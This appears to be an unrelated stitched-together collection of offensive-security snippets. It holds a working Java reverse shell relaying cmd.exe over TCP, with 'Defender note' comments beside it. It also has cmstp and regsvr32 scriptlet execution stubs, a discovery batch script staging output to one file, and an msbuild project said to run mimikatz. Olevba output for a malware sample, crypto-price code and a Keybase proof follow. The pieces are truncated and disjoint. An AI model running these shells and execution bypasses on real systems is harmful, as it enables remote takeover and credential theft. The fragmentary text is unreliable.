// Reverse-shell pattern: starts a local command interpreter and relays its
// standard streams over an outbound TCP connection to host:port.
// Defender note: what this produces on the host is a JVM process that spawns
// cmd.exe and opens an outbound socket. Child-process creation by the JVM and
// the matching connection are the events to log and alert on. The channel is a
// plain Socket, so the relayed console traffic is unencrypted on the wire.
String host="localhost";
int port=8044;
String cmd="cmd.exe";
// redirectErrorStream(true) merges the child's stderr into its stdout, so the
// separate copy loop over pe (the error stream) has nothing left to read.
// The main loop copies available bytes one at a time in three directions
// (process stdout -> socket, process stderr -> socket, socket -> process stdin),
// flushes both outputs and sleeps 50 ms per pass.
// p.exitValue() throws while the child is still running (the exception is
// swallowed); once the child has exited it returns and the break ends the loop.
// Afterwards the child is destroyed and the socket closed.
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
; Defender note: the next line records how this file is meant to be used:
; cmstp.exe run with /s against an INF. Executions of cmstp.exe that name an
; INF from a user-writable path are worth logging and alerting on.
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
; The install section below delegates to the section named by UnRegisterOCXs.
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
; The entries of this section are not visible in this excerpt.
[UnRegisterOCXSection]
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
Author: Casey Smith @subTee
REM Host and network discovery commands. Every command appends its output to
REM the same staging file, C:\Tools\Debug\1.txt.
REM Defender note: these built-ins (ipconfig, tasklist, net, netstat) run back
REM to back with output redirected to one file form a recognisable discovery
REM sequence. Process-creation logging with command lines captures it.
REM Interface configuration and running processes.
ipconfig /all>> C:\Tools\Debug\1.txt
tasklist /v >> C:\Tools\Debug\1.txt
REM Local accounts and members of the local administrators group.
net user >>C:\Tools\Debug\1.txt
net localgroup administrators>>C:\Tools\Debug\1.txt
REM Connections with owning process IDs, then mapped shares and visible hosts/domains.
netstat -ano >> C:\Tools\Debug\1.txt
net use >> C:\Tools\Debug\1.txt
net view >> C:\Tools\Debug\1.txt
net view /domain >> C:\Tools\Debug\1.txt
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes mimikatz. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<!-- Target "Hello" runs the ClassExample task; the task's definition is not part of this excerpt. -->
<!-- Defender note: msbuild.exe building a project file from a user-writable location is the process event to log and review here. -->
<Target Name="Hello">
<ClassExample />
</Target>
## uploaded by @JohnLaTwC
## sample hash: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
MHT:MASIHB-- 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
===============================================================================
FILE: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
Type: MHTML
-------------------------------------------------------------------------------
//from: https://github.com/rathergood/Crypto-Currency-Price/blob/master/ccprice
//returns price (or other info) of cryptocurrency from coinmarketcap api.
//takes two parameters, the name of the cryptocurrency and info that you want returned about the cc
//example: =ccprice("ethereum", "USD")
//example2 =ccprice("ethereum", "24h_volume_usd")
function ccprice(name, currency)
{

Keybase proof

I hereby claim:

  • I am carnal0wnage on github.
  • I am carnal0wnage (https://keybase.io/carnal0wnage) on keybase.
  • I have a public key ASBAbr1taoZoDoZ5mQsko2BW675dxHpNRP-cenmfGfO03Qo

To claim this, I am signing this object: